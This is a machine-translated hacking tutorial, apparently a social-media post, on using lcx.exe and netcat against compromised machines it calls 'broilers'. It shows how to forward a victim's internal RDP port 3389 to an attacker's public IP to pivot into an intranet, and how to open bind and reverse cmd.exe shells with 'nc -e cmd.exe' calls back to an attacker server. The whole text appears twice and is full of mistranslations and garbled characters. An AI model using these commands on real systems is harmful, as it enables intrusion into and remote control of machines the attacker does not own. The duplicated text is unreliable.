Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.
usage:
For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.
B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
[+] Accept a Client on port 55 from 222.221.221.22 β¦β¦
[+] Waiting another Client on port:3389β¦.
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers
C) The following is a supplement from other netizens:
Native: lcx -listen 2222 3333
2222 is the forwarding port, and 3333 is any unoccupied port of the machine
Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port
3389 format when connected 127.0.0.1:3333
D) Intranet forwarding gesture
1. Use of lcx
1. Execute on broiler: lcx.exe βslave public network ip + port broiler ip + port
For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389
It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network
2. Execute Lcx.exe βlisten 10000 10001 on the public IP machine
For example: Lcx.exe βlisten 10001 10000
It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.
At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.
E) Two, nc rebound cmdshell
1. Open the broiler agent to execute cmdshell
Execute nc -l -p 2333 -t -e cmd.exe on the broiler
This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode
Execute nc -nvv broiler ip 2333 on your own public network server
2. Reverse proxy execute cmdshell
Run nc -l -p 2333 on the public network server
It means to monitor the local port 2333 and log in to other computers on the stage
Execute nc -t -e cmd.exe on the broiler, public network server ip 2333
It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):
A) Let's first explain in detail the LXC forwarding tools and usage methods:
lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.
usage:
For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.
B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
[+] Accept a Client on port 55 from 222.221.221.22 β¦β¦
[+] Waiting another Client on port:3389β¦.
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers
C) The following is a supplement from other netizens:
Native: lcx -listen 2222 3333
2222 is the forwarding port, and 3333 is any unoccupied port of the machine
Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port
3389 format when connected 127.0.0.1:3333
D) Intranet forwarding gesture
1. Use of lcx
1. Execute on broiler: lcx.exe βslave public network ip + port broiler ip + port
For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389
It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network
2. Execute Lcx.exe βlisten 10000 10001 on the public IP machine
For example: Lcx.exe βlisten 10001 10000
It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.
At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.
E) Two, nc rebound cmdshell
1. Open the broiler agent to execute cmdshell
Execute nc -l -p 2333 -t -e cmd.exe on the broiler
This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode
Execute nc -nvv broiler ip 2333 on your own public network server
2. Reverse proxy execute cmdshell
Run nc -l -p 2333 on the public network server
It means to monitor the local port 2333 and log in to other computers on the stage
Execute nc -t -e cmd.exe on the broiler, public network server ip 2333
It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β